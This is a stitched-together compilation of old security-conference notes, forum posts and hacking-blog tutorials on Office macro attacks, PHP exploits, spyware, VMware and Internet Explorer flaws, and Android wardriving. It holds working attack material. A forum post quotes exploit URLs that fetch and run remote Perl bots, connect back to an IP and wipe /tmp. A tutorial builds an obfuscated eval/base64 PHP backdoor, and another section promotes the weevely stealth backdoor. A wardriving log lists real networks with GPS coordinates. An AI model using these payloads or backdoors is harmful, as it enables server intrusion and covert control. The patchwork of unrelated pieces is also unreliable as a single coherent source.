Office Documents: New Cyber Weapons

Reallity of cyberwarfare
-August 2007: Espionage case of China against German chancelery. 163 Gb of Gouvernemental data stolen through a Trojan-infected Office document.
-2009 to 2010: Chinese hackers succeeded in stealing economic and financial data from European Banks, through malicious PDFs. 

Document as cyberweapons
-(Open)Office document are good vectors
-PDF documents are also used nowadays

The Cyberwarfare Show
-PWN2KILL, May 2010 Paris, challenge has proved the risk is real and high.
http://www.esiea-recherche.eu/iawacs2010.html
-Huge technical possibilities on one side, quite no protection and detection capability on the other side.
-Many critical systems are rather secure with a strong security policy enforced.
-Classical approaches are less and less possible, not say impossible.

Which applications are concerned?
-Office 2010
-OpenOffice 3.x
-All other office applications

What is the Purpose?
-To install malicious payload into the operating system, whithout being detected by any AV.
-We do not want to exploit any vulnerability (target = secure sensitive systems e.g. combat systems).

Macro Security in MSO
Possible level of security:
Level 4 (0x00000004): Disable all macros without notification.
Level 3 (0x00000002): Disable all macros with notifiation.
Level 2 (0x00000003): Disable all macros except digitally signed macros.
Level 1 (0x00000001): Enable all macros.

Location of settings:
Registery key : HKEY_CURRENT_USER\Software\Microsoft\Office\ 12.0\ \Security
Application = {Word, Excel, Powerpoint, Access}

Trusted location:
A trusted location is a directory where macros of documents stored inside are allowed to be executed automatically.


Macro Security in OpenOffice
Security settings:
Both Macro security level and trusted location are defined in "Common.xcu" file at:
Openoffice.org\3\user\registery\data\org\openoffice\Office

Example:

1:    
2:    
3:    
4:  0  

Trusted Location:
Set the root directory as Trusted location

1:    
2:    
3:    
4:  file:///C:/  

The use of 'AutoExec' event with MSO:
-Able to naturally bypass the level 2 of execution.
-Several events are available: AutoNew, Open, Close, Exit, Exec
-Applied on template named Normal.dotm and stored inside MSO's users settings file.
-Execute the macro at opening event even if any macro are not allowed to be executed (Level 2).

MSO and OO: The integration
-Both are based on the W3C specification. But the integration is totally different.

MSO’s integration:
-Office makes it easier to create signatures.
-It is possible to create self-signed certificates.
-They are stored inside _rel\.rel file within the document.

Openoffice’s integration:
No significant change about signature since 2006, the first study.
Black Hat 2009, Amstersdam, E.Filiol J.-P. Fizaine, Openoffice v3.x Security Design Weaknesses.

MSO Case
+Change to the lowest level: 0
Interesting Keys: HKEY_CURRENT_USER
Path: Software\\Microsoft\\Office\\12.0\\Word\\Security
Windows API: RegOpenKeyEx, RegSetValueEx, RegCreateKeyEx, RegCloseKey

+Set the directory c:\Users as a Trusted Location.
KEY: HKEY_CURRENT_USER
Path: Software\\Microsoft\\Office\\12.0\\Word\\Security\\Trusted\\Locations
Path2: Software\\Microsoft\\Office\\12.0\\Word\\Security\\Trusted\\Locations\\Location3

OpenOffice Case
+Change the Macro security level to the lowest: 0
-Settings are stored in only one file! No use of specific library is needed, the C Standard Library is sufficient.
-Forge the Path
-Locate the position inside the file
-Insert the value:

1:     
2:    
3:  0     

-Update by restart the application

+Trusted Locations
-Insert the value:

1:     
2:    
3:  file:///C:/     

K-ary Malware
Malware made of k-different, innocent-looking (from the AV point of view). Each of them can (inter)act independently or not and can either be executed in parallel or in sequential. Not all the parts are necessarily executable. The cumulative action of each part defines the malware action.

Proof of Concept (PoC):
E. Filiol, Journal in Computer Virology, 2007.
Hack.lu 2009, A. Desnos, Implementation of K-ary viruses in Python.

Two waves of attack: The use of 2-ary malware
Suppose the security level is set to the paranoid mode, it is impossible to change the level from inside the macro.

Journal in Computer Virology, 2006, D. de Drézigué, J.- P. Fizaine, N. Hansma, In-depth Analysis of the Viral Threats with OpenOffice.org Documents

Why this approach?
-Attacking (secure) systems becomes really complex. Just exploiting one or more vulnerability does no longer suffice. Installing a functionnally sophisticated program is less and less easy. The solution is to split the viral information into many pieces!
-Real case: secure systems generally filter and forbid packed binaries/shellcodes.
-Using 2-ary malware is a powerful alternative.
-The first executable performs a innocent, generally legitimate simple action.
-The office document then installs more complex malware transparently and silently.

Protection and Countermeasures
-Use of Public Key Infrastructure
-Whenever self-signed certificates are used. Check the serial number, timestamp and validity systematically. The serial number is supposed to be unique.

php script exploits - hacking

php script exploits - hacking

---

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. Many times its well known in the community which scripts are vulnerable and they get fixed. For example at one time PHPBB was vulnerable and any versions older then xx could be exploited. Following that it was AWstats and the list goes on.

What the hackers do is pass the script some variables and commands in an http URL. The vulnerability is that the script allows the commands to be run.

Here are a few examples:

/misc.php?do=page&template={${system("cd%20/tmp;wget%20http://shop.rjp.ca/images/canalshell/bd/dc;%20chmod%20777%20dc.pl%20;%20perl%20dc.pl;%20dc .pl%20201.8.188.152%204222")}}

//include/print_category.php?setup%5Buse_category%5D=1/include/print_category.php?setup%5Buse_category%5D=1&dir=h ttp://www.bh-net.dk/cmd2.gif?&cmd=uname%20-a%20;%20id HTTP/1.1

You can see the hacker puts in the URL a few commands and the paths to other scripts they want to upload which then allow them to upload more scripts and run more commands etc...

All of this happens under the user that apache (httpd) is running under which is usually the user nobody. Most of the time in the way this happens the hacker ends up with access only to the /tmp directory. Hence most of the hackers files and scripts are found in the /tmp directory.

The next thing the hacker does is usually upload and IRC bot so they can chat and show off they have hacked the server. Then they usually upload scanning tools or ddos'ing (flooding) tools and start to either scan other servers to attempt to hack or they start a ddos attack against another server.

The good news is they dont have root access so once you remove all their files and stop all their processes (you can just reboot for this) they are gone. However if you dont find and fix the vulnerable script they will come right back.

So how do you find the script? Well thats the hard part. Sometimes there is a community wide problem as mentioned above with PHPBB and AWstats so you know exactly what you need to update/upgrade. However, many times these may be custom scripts or one-off scripts that may have a vulnerability. If you are not a programmer and dont have time to go through every php script on your server the next best bet is to go through all your httpd logs and look for a similar looking URL to the ones posted above - Keep in mind the name of the script will probably not be the same but the formation of the URL will be similar and not like the other things in the httpd logs. This can be time consuming and tedious unfortunately, but its really the only way.

Once you find the script you can either fix it by reprogamming it, or updating it with a fixed version, or you can delete it. You can also install mod_security into Apache which will block most all php/command attempts. If you have a cpanel server its available for free as an add-on. 

 

here is the latest attempts going around to get in via awstats

/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.members.lycos.co.uk/adisef/newbot;perl%20netsky;echo%20;rm%20-rf%20netsky*;echo| HTTP/1.1

 

hacker attemp to inject script

---

My site has been hacked recently by injecting the following script . This script starts downloading malware,badware as soon as the page is resolved in the browser . Hosting guys say they cannt do any thing about it and requested upgrade script .
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .

Some body may please let me know the solutions.


I need some solutions to protect my site from such malicious attack.

A Stealth Tiny PHP Backdoor! weevely 23:54

With Weevely you can create and manage PHP trojan designed to be hardly detectable. This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. Generate PHP code to trojanize a web server, and act like a telnet client to execute commands or inject addictional function on backdoored server. weevely is also included in blackbox linux.

Features of weevely:

• Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
• PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server.
• Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
• Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .

Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses.

Download Weevely v0.3 (weevely-0.3.tar.gz) here.

Creating Backdoors in PHP

Creating Backdoors in PHP

Dear members and guests of Hackers Club,


This is a small tutorial to how One could make backdoors in PHP.
The reason why a backdoor may be needed could be if your site
gets hacked but if there's no protection on the backdoor and if
a hacker finds that backdoor then your site may get hacked that
way too, so be careful with these examples.

First we need to know which functions we can use:
- System(); // Executes an external program.
- Exec(); // Executes an external program.
- Fopen(); // Opens a file on the system.
- Include(); // Includes a file to be executed.
- Eval(); // Executes PHP code.

With that in mind, we move over to how the backdoor can receive input:
- $_GET['var']; // Receives input like: file.php?var=command
- $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used).
- $_COOKIE['var']; // Receives input via browser-cookies.

Now we might want to encode the backdoor, a few ways are:
- Base64 encoding (base64_encode() is a builtin function).
- Encode it like shellcode: "\xDE\xAD\xBE\xEF";
- And possibly many more ways!

So lets say you want to create a backdoor which uses:
- system() + $_GET[] + base64_encode()

Before encoding anything we write the code that we want to be executed:

PHP Code:

($_GET['s3cr3t']); ?>

That's how simple it will look if it wasn't encoded.

In order to encode it we can either use an application or do it ourselves:
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);
?>

Which results in: c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7

In order to execute it we need the following PHP code:

PHP Code:

eval(base64_decode("c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7"));?>

Which will work fine if we supply a GET-request to the file it is
included in all the time. Otherwise it will send an error to the site
because system() can't handle empty requests.

In order to bypass this issue we could use: error_reporting(0); in
our script. But that results in a lot more code! So why not use some-
thing easier such as @ before the command?

This should supress all warnings, from system() only of course.

Without encoding the backdoor the code would look like:

PHP Code:

@system($_GET['server']); ?>

Pretty simple? I think so too and I'm glad that I haven't seen
that many problems with PHP backdoors yet since it would be
a pain to check anything you might want to use, for backdoors.

Our backdoor is at this stage very simple but also very small.

One of the first things to implement after using system() or exec()
would be sending the output to

tags so the output is
easy to read which is a good idea when using PHP backdoors.

The other commands we can use, fopen() and include() in short
may be used for LFI and perhaps RFI (depending on php.ini settings).

Eval() can be used to execute PHP code directly which would probably
be one of the most effective backdoors if the hacker, knows PHP of course!

That's basicly it of what you could or should know about PHP backdoors at the moment.

Update:
I've recently had some more cool ideas (which are hard to implement, yet more stealthy).
I will write about them as soon as I am done with my other projects (I have many at the
moment and there is a lot of testing with my new ideas).

Meanwhile I also created a better application in PHP for creating and encoding backdoors!

Application Link: HaXxd00r


Best regards,
Sumit Shukla

Automated Independent Gadget Search

Goal
The goal of this research is to be able to use return-oriented programming platform independently across multiple platforms.

Motivation
-CPU Architecture diversity is increasing.
-We want to execute code on machines despite the presence of non-executable memory, but we do not aim for ASLR.

History

Strategy
-Use only already present code
-No single instruction / return like approach
-Use REIL to be platform independent
-Use "free-branch" instructions rather than ret only
-"Find all first, then filter useful ones" approach
-Keep an eye on side-effects and minimize them

Small RISC instruction set:
-17 instructions for arithmetic, control flow and misc functionality
-Instructions are always side-effect free

Interpreter:
-Virtually unlimited memory and temporary registers
-Implemented as a register machine

No support for:
-Exceptions, floating point instructions, 64Bit instructions yet

Algorithms

Algorithms stage I
Collect data from the binary:
1.Extract expression trees from native instructions
-Handlers for each possible REIL instruction
-Most of the handlers are simple transformations
-Memory store and conditional execution need special treatment

2.Extract path information
-Path is extracted in reverse control flow order
-We want to have all possible outcomes for a conditional execution in a single expression tree


Algorithms stage II
Merge the collected data from stage I:
1.Combine the expression trees for single native instructions along a path

1:  0x00000001 ADD R0, R1, R2  
2:  0x00000002 STR R0, R4  
3:  0x00000003 LDMFD SP! {R4,LR}  
4:  0x00000004 BX LR  

2.Determine jump conditions on the path
3.Simplify the result

Algorithms stage III
Goal of the stage III algorithms:
-Search for useful gadgets in the merged data. Use a tree match handler for each operation.
-Select the simplest gadget for each operation. Use a complexity value to determine the gadget which is least complex (side-effects).

Results
-Algorithms for platform independent return-oriented programming are possible
-We are able to find all necessary gadgets for return-oriented programming using our tool
-Searching for gadgets is not only platform but also very compiler dependent
-Minimizing side-effects is possible if the right approach is chosen

Future work
-Abstract gadget description language
-Automatic gadget compiler for all platforms
-Bring more platforms to REIL
-Better understand the implications of different compilers.........

Advanced Mobile Spyware

Mobile Spyware

-Often includes modifications to legitimate programs designed to compromise the device or device data
-Often inserted by those who have legitimate access to source code or distribution binaries
-May be intentional or inadvertent
-Not specific to any particular programming language
-Not specific to any particular mobile Operating System

Attacker Motivation
Practical method of compromise for many systems
–Let the users install your backdoor on systems you have no access to
–Looks like legitimate software so may bypass mobile AV

Retrieve and manipulate valuable private data
–Looks like legitimate application traffic so little risk of detection

For high value targets such as financial services and government it becomes cost effective and more reliable
–High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation
–Think "Aurora" for Mobile Devices

FlexiSpy
http://www.flexispy.com
$149 -$350 PER YEAR depending on features
Features:
–Remote Listening
–C&C Over SMS
–SMS and Email Logging
–Call History Logging
–Location Tracking
–Call Interception
–GPS Tracking
–Symbian, Blackberry, Windows Mobile Supported

Mobile Spy
http://www.mobile-spy.com
$49.97 PER QUARTER or $99.97 PER YEAR
Features:
–SMS Logging
–Call Logging
–GPS Logging
–Web URL Logging
–BlackBerry, iPhone(JailbrokenOnly), Android, Windows Mobile or Symbian

Etisalat (SS8)
-Cell carrier in United Arab Emirates (UAE)
-Pushed via SMS as "software patch" for Blackberry smartphones
-Upgrade urged to "enhance performance" of Blackberry service
-Blackberry PIN messaging as C&C
-Sets FLAG_HIDDEN bit to true
-Interception of outbound email / SMS only
-Discovered due to flooded listener server cause retries that drained batteries of affected devices
-Accidentally released the .jar as well as the .cod (ooopsie?!)

Bugs & Phonesnoop
–Exfiltration of inbound and outbound email
–Hidden
–Remotely turn on a Blackberry phone microphone
–Listen in on target ambient conversation

Storm8 Phone Number Farming
–iMobstersand Vampires Live (and others)
–"Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhoneuser who downloads any Storm8 game," the suit alleges. "... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed."
–"Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue."

Symbian Sexy Space
–Poses as legitimate server ACSServer.exe
–Calls itself 'Sexy Space'
–Steals phone and network information
–Exfiltrates data via hacker owned web site connection
–Can SPAM contact list members
–Basically a "botnet" for mobile phones
–Signing process: Anti-virus scan using F-Secure (Approx 43% proactive detection rate (PCWorld))
-Random selection of inbound manually assessed
–Symbiansigned this binary as safe!

09Droid –Banking Applications Attack
–Droid app that masquerades as any number of different target banking applications
–Target banks included: Royal Bank of Canada, Chase, BB&T, SunTrust, Over 50 total financial institutions were affected
–May steal and exfiltrate banking credentials
–Approved and downloaded from Google’s Android Marketplace!
–http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-market
–http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953

Blackberry Takes Security Seriously
-KB05499: Protecting the BlackBerry smartphoneand BlackBerry Enterprise Server against malware: http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB05499
-Protecting the BlackBerry device platform against malware: http://docs.blackberry.com/en/admin/deliverables/1835/Protectingthe BlackBerry device platform against malware.pdf
-Placing the BlackBerry Enterprise Solution in a segmented network: http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf
-BlackBerry Enterprise Server Policy Reference Guide: http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Reference_Guide.pdf

Does It Really Matter?
-Only 23% of smartphone owners use the security software installed on the devices.
(Source: Trend Micro Inc. survey of 1,016 U.S. smartphoneusers, June 2009)
-13% of organizations currently protect from mobile viruses
(Mobile Security 2009 Survey by Goode Intelligence)

Code Signing
-Subset of Blackberry API considered "controlled"
-Use of controlled package, class, or method requires appropriate code signature
-Blackberry Signature Tool comes with the Blackberry JDE
-Acquire signing keys by filling out a web form and paying $20
–This not is a high barrier to entry
–48 hours later you receive signing keys
-Install keys into signature tool
-Hash of code sent to RIM for API tracking purposes only
-RIM does not get source code
-COD file is signed based on required keys
-Application ready to be deployed
-Easy to acquire anonymous keys

IT Policies
-Requires connection to Blackberry Enterprise Server (BES)
-Supersedes lower levels of security restrictions
-Prevent devices from downloading third-party applications over wireless
-Prevent installation of specific third-party applications
-Control permissions of third party applications
–Allow Internal Connections
–Allow Third-Party Apps to Use Serial Port
–Allow External Connections
-MOSTLY "Default Allow All" policy for BES and non-BES devices

Application Policies
-Can be controlled at the BES
-If no BES present, controls are set on the handheld itself
-Can only be MORE restrictive than the IT policy, never less
-Control individual resource access per application
-Control individual connection access per application
-MOSTLY "Default Allow All" policy for BES and non-BES devices

Installation Files
-.COD files:A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.
-.JAD files:An application descriptor that stores information about the application itself and the location of .COD files
-.JAR files:a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.
-.ALX files:Similar to the .JAD file, in that it holds information about where the installation files for the application are located

txsBBSpy Logging and Dumping
-Monitor connected / disconnected calls
-Monitor PIM added / removed / updated
-Monitor inboundSMS
-Monitor outbound SMS
-Real Time trackGPS coordinates
-Dump all contacts
-Dump current location
-Dump phone logs
-Dumpemail
-Dump microphone capture (security prompted)

txsBBSpy Exfiltration and C&C Methods
-SMS (No CDMA)
-SMS Datagrams(Supports CDMA)
-Email
-HTTP GET
-HTTP POST
-TCP Socket
-UDP Socket
-Command and control hard codedto inbound SMS

Future Work (Offensive AND Defensive)
-Reverse engineer .cod file format
-Continued research into unobstructed installation methods (requires exploitation)
-Infect PC with virus that acts as distribution hub
-Research additional exfiltration methods for tunneling without prompting..

Broad View of Cloud Security

Cloud Computing in the security industry has multiple definitions and several approaches:

-URL scanning
-AV scanning
-Spam scanning
-RBL
-and more...

Cloud Paradigm
-Pro Cloud
-Against Cloud
-A hybrid approach is better

Strenghts
-No versioning (no large product updates)
-Low resource consumption
-Higher speed
-Not OS dependant
-Not hardware dependant
-Instant access to updates
-New technologies available like outbreak detection or statistics based algorithms
-Sometimes...It is also cheaper

Weaknesses
-No internet connection means no cloud
-Susceptible to DDOS attacks
-Resource Consumption just moved in the cloud. It didn’t vanished!
-Connection spikes can cause false negatives (or, even self-DDOS)
-Instant updates can also mean instant faulty updates
-Data center failure means no detection

What Else Can Cloud Offer?
Opens the door to a new set of:
-Applications
-Devices
-Operating systems

Size Does Matter
-Several sources of URLs means an extremely large number of URLs
-Several clients that query the cloud means a massive number of links that have to be analyzed
-Links have various statuses (clean, infected, phishing, fraud) which change dynamically
-So, one has to move fast...

Lies, Damned Lies and Statistics
-Targeted attacks stay under the radar
-Slow spreading malware too

Not everybody likes us
-Website owners
-ISPs
-Maybe even social networks?
-And hopefully the bad guys (i.e. Hackers)

Conclusion
-We believe that a hybrid approach is best
-The cloud should be used as another filtering method and not as a universal solution
-Not only there should be a hybrid approach, but also these techniques have to be interconnected
-Although it looks quite easy in theory, creating and maintaining a cloud architecture is not an easy process..

Attacking VMWare Guest Machines

Vulnerability Discovery
-Vulnerability identified on 5/14/09
-Reported to VMware on 5/15/09
-VMware responded on 5/21/09
-CVE-2009-3733 reserved on 10/20/09
-VMSA-2009-0015 released on 10/27/09
-"Directory Traversal vulnerability"

Identification
-Originally identified on VMware Server 2.0.1 build 156745 (on Ubuntu 8.04)
-Thought to be localized to inside of NAT interface of Host (8307/tcp)
-Can steal VMs from within other VMs... if NAT.

Description
-Web Access web servers also vulnerable
-Server (default ports 8222/8333) - ../ x 6
-ESX/ESXi (default ports 80/443) - %2E%2E/ x 6
-No longer requires NAT mode / Remotely exploitable
-Not as straightforward as originally thought
-Still trivial to exploit because...

Root Access Is Easy


How it works?


-Web server on 8308/tcp is vulnerable, but will only serve certain filetypes (xml, html, images, etc.)
-Web server on 8307/tcp is also vulnerable, but serves ALL filetypes
-Simply append /sdk to our URL request and we’ve got complete access to Host filesystem (including other Virtual Machines)
-ESX/ESXi - ALL web servers return ALL filetypes (no /sdk)

Vulnerable Versions
Server
-VMware Server 2.x < 2.0.2 build 203138 (Linux)
-VMware Server 1.x < 1.0.10 build 203137 (Linux)

ESX/ESXi
-ESX 3.5 w/o ESX350-200901401-SG
-ESX 3.0.3 w/o ESX303-200812406-BG
-ESXi 3.5 w/o ESXe350-200901401-I-SG

Guest Stealer
-Perl script remotely ‘steals’ virtual machines from vulnerable hosts
-Supports Server, ESX, ESXi
-Allows attacker to select which Guest to ‘steal’
-Utilizes VMware configuration files to identify available Guests and determine associated files

VMINVENTORY.XML
-/etc/vmware/hostd/vmInventory.xml (default location)
-Gives us Guest inventory & location information





Mitigation
-Patch, patch, patch
-Hosts are an attractive target (compromise one = access many)
-Better yet...Segment, segment, segment
-Segment management interfaces
-Segment systems of different security levels
-Don’t share physical NICs between different security levels
-Virtualization is not always the "best answer"

Internet Explorer: Your personal computer is public property

A successful compromise will result in an attacker being able to blindly read every single file in the local drive.
–Either text and binary files (thanks MSXML2.DOMDocument.3.0!)
–Cross-domain information (Navigation history, Cookies)
–SAM backup files
–Recently opened files
–Personal pictures
–Other files, depending on the computer compromised (wwwroot in IIS, Configuration files for other applications)

Internet Explorer Internals
-Every browser has its own idiosyncrasies
-For the purposes of this presentation, it is convenient to review some design features of Internet Explorer
1.Security Zones
2.Zone Elevation
3.MIME type detection

Security Zones
-Enable administrators to divide URL namespaces according to their respective levels of trust and to manage each level with an appropriate URL policy Different treatment for web content depending on its source
-Five different sets of privileges (zones)
1.Restricted Sites
2.Internet
3.Trusted Sites
4.Local Intranet
5.Local Machine

Zone Elevation
-It occurs when a Web page in a given security zone loads a page from a less restrictive zone in a frame or a new window
-Internet Explorer behaves different based on which is the less restrictive zone up to which is trying to elevate
1.to the Local Machine zone is blocked
2.to the Intranet or Trusted Sites zones prompts for a confirmation
3.from the Restricted Sites zone to the Internet zone is allowed

MIME type detection
-Tests URL monikers through the FindMimeFromData method
-Determining the MIME type proceeds as follows:
1.If the suggested MIME type is unknown, FindMimeFromData immediately returns this MIME type as the final determination
2.If the server-provided MIME type is either known or ambiguous, the buffer is scanned in an attempt to verify or obtain a MIME type
3.If no positive match is obtained, and if the server-provided MIME type is known
4.If no conflict exists, the server-provided MIME type is returned. If conflict exist, the file extension is tried.
5.Otherwise defaults to text/plain or application/octet-stream

Features (vulnerabilities) enumeration
-Hiding the key under the doormat
-A chip off the old block
-Two zones, the same place
-How to put HTML/script code in remote computers
-Everything that glitters is not gold

Hiding the key under the doormat
-Internet Explorer cookies and history files are stored in different files and folders under %USERPROFILE%
-As a security measure, these files are stored inside randomly named folders with random file names
-These random names and locations are logged inside different mapping files named index.dat

%USERPROFILE%\Local settings\History\History.IE5\index.dat
%USERPROFILE%\Local settings\IECompatCache\index.dat
%USERPROFILE%\Cookies\index.dat

-These files are not entirely text formatted
-As these files work as maps to other files, access to these files would reveal the actual locations of mapped files and folders



A chip off the old block
-Internet Explorer resembles Windows Explorer in many aspects (both of them implement the Trident layout engine and both of them support UNC paths for SMB access)
-This way, Internet Explorer allows to access special files and folders, same as Windows Explorer does

Any web page in the Internet zone or above can include an HTML tag as follows:

-It will trigger an SMB request against 208.77.188.166
-As part of the challenge-response negotiation, the client sends to the server the following information about itself:
1.Windows user name
2.Windows domain name
3.Windows computer name
4.A challenge value chosen by the web server ciphered with the LM/NTLM hash of this user’s password

Two zones, the same place
-Internet Explorer will determine the security zone of a given UNC address as belonging to:
1.The Internet security zone if this path contains the IP address of the target machine
2.The Local Intranet security zone if this path contains the NetBIOS name of the target machine

-It makes sense, as SMB names just can be resolved in the same network segment
-\\NEGRITA is in the Local Intranet zone
-\\127.0.0.1 is in the Internet zone
-This is one of the root causes of the problems the Microsoft staff has into closing the attack vectors exposed here
-After several discussions with MSRC team members, they stated this issue is kind of a dead end, and cannot be fixed
-According to the Security Zones scheme, a page in a given zone can not redirect its navigation to a more privileged zone
-This behavior is known as Zone Elevation
-Now, consider the following dialog:



-In this case Internet Explorer will erroneously (due to this ambiguity) apply Zone Elevation restrictions and the redirection will effectively occur
-There is another way to bypass Security Zone restrictions
-Suppose that example.com (10.1.1.1) was explicitly added to the Restricted Sites Security Zone
-Then this URI will be treated with the privileges of that zone
-However, if the same resource is requested using the UNC notation, it will be treated as belonging to the Internet Security Zone (e.g. \\10.1.1.1\index.html)
-Restricted Sites restrictions to a given resource are bypassed if it can be accessed using a different protocol [file: | https: | ...]


How to put HTML/script code in remote computers
-There are different ways for remote servers to write HTML/script code in clients hard drives
1.Navigation history files
2.Cookies
3.Mapping files (Internet Explorer index.dat)

-Problems in the design/implementation of these feature
1.Contents are saved as they were received, with little or no sanitization/overhead, into these files
2.Internet Explorer allows rendering the contents of non-pure HTML files skipping the parts that can not be rendered


Everything that glitters is not gold
-The way Internet Explorer decides how to treat a given file is known as MIME type detection
-It basically uses an algorithm to find and launch the correct object server/application to handle the requested content
-Is based on information obtained from
1.The server-supplied MIME type, if available
2.An examination of the actual contents associated with a downloaded URL (FindMimeFromData)
3.The file name associated with the downloaded content (assumed to be derived from the associated URL)
4.Registry settings (file extension/MIME type associations or registered applications) in effect during the download

-Problems in the design/implementation of this feature:
1.The server-provided MIME type is returned when the following conditions are true:
-no positive match is obtained from the FindMimeFromData() buffer scan
-server-provided MIME type is known
-no conflict exists (format is either text or binary)

2.Has been probed (more than once) not to behave deterministically when accessing the same resource through different methods
-direct navigation
-redirection
-frame/iframe reference
-scripting

Turning features into vulnerabilities to build an attack
-In and of itself each of these bugs may not seem like something you should be concerned about
-The combined use of them by an attacker may lead to some interesting attacks

Case 1: Attacking local networks with shared folders

Case 2: Attacking the Internet user


Overall Impact
-By chaining the exploitation of a series of weak features an attacker is able to store HTML and scripting code in the victim’s computer and force the victim’s browser to load and render it
-127.0.0.1 is in the Internet Zone, but as the code is actually stored in the victim’s computer, it can access other files in the same computer (in this case, the victim’s computer)
1.SAM backup files
2.All of the victim’s HTTP cookies and history files
3.Source files in Inetpub\wwwroot
4.Recent files, personal pictures (thumbs.db maps these files)
5.Any other file on the local system (system events, configurations)

These attack scenarios have been proven to work:
1.CORE-2008-01035
2.CORE-2008-0826
3.CORE-2009-06256

-The only difference is in the way Internet Explorer is tricked into rendering its internal tracking files as HTML
-That is the only thing Microsoft is fixing. This is a design problem. They are just blocking our proof of concept
-That is why we are breaking it over and over again

Solutions and Workarounds
-Internet Explorer Network Protocol Lockdown
-Set the Security Level setting for the Internet and Intranet zones to High
-Disable Active Scripting for the Internet and Intranet zone with a custom setting
-Only run Internet Explorer in Protected Mode
-Use a different web browser to navigate untrusted web sites

Wardriving with Android | Hacking Wifi networks with Android | Wifi Network Audit using Android | Wifu with android | Best wardriving applications on android

Hi friends.. I recently bought HTC wildfire and have been experimenting with it to the fullest. Its based on Android 2.2.1  Froyo and is unrootable till date using Unevoked, superoneclick root and z4root rooting applications, hence i am bit limited by the default manufacturer only functions. I nearly bricked my phone but it sprang back to life after some trys. On the topic though. I was actually quite interested in testing the wardriving capabilities of the device and hence on scrolling through the app market, I found some useful applications which I thought must share you with. Wardriving for me is a two step process -

• scanning networks and analyzing them
• breaking them if vulnerable. (WEP using generic packet capture, WPA using rainbow)

G-mon

G-mon is a powerful WarDriving scanner and GSM / UMTS Netmonitor and drive test tool. It scans for all WiFi networks in range & saves the data with GPS coordinates into a file on your sd card. You can create a kml file for Google Earth. It shows you the encryption, channel an signal strength. It shows all APs in range in a live map. I used it to collect lots of wifi data which I will be publishing soon.

Install it from here

Wardrive

another fantastic wardriving app which stores scans in sqlite db on the sdcard and displays found networks around in the map.It Requires Google MAPS installed.

Install it from here

Wifi Analyzer

This app literally turns your android phone into a Wi-Fi analyzer!! It helps you to find a less crowded channel for your wireless router and allows to audit networks.

Install it from here

Once you get networks, you can then break them into it using Aircrack and backtrack.  Its easy and worth its salt :) . Here is a slice of my wardriving logs while i was in DTC bus :D

BSSID;LAT;LON;SSID;Crypt;Beacon Interval;Connection Mode;Channel;RXL;Date;Time
00:08:5C:EF:08:F0;28.56602;77.22951;Adiva;WpaPsk;-93;Infra;11;-92;2011/03/17;18:52:01
00:08:9F:81:8F:C4;28.56944;77.20531;Car0baR;WPA2;-96;Infra;6;-95;2011/03/17;18:58:30
00:0F:A3:6A:88:B8;28.56804;77.22473;sbi;Wep;-93;Infra;6;-91;2011/03/17;18:53:02
00:17:9A:09:D1:79;28.56813;77.22440;WebunivM;Wep;-93;Infra;6;-91;2011/03/17;18:53:05
00:18:02:87:02:8F;28.56845;77.22306;RT2561_6;Wep;-94;Infra;6;-93;2011/03/17;18:53:18
00:18:02:8E:32:5A;28.56885;77.21437;SrDDGA;WpaPsk;-91;Infra;6;-90;2011/03/17;18:55:31
00:18:02:92:A2:73;28.56955;77.20365;mtnlbb;Wep;-90;Infra;6;-89;2011/03/17;19:00:21
00:18:39:AA:5E:B8;28.56845;77.22306;Neeta;Wep;-89;Infra;11;-88;2011/03/17;18:53:18

at the end of the day, the moment that put a smile on my face was when i saw this as a network name near Delhi Cantt -

“You cant hack this Wifi dear neighbor”

It was a wpa2/psk secured network with static ip and mac filtering and the guy knew what he was doing :) Watching secured networks always makes my day.

Hacking PHP 4.4 sites in 20 seconds

Now here is  a real hacking tutorial in which I am going to hack a real website,and that too in less than 20 seconds.and I am not kidding. Actually sites with PHP  4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.
Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course :P).It will be partial in nature,that is I WILL not be teaching each and everything to you,I assume you know basics of SQL injection/PHP injection/Google searching,and if you don't then read these articles first -

Google Search Tips for Hacking
Google Secrets – Some Cool Google Dorks
Basics of SQL Injection
SQL injection by example
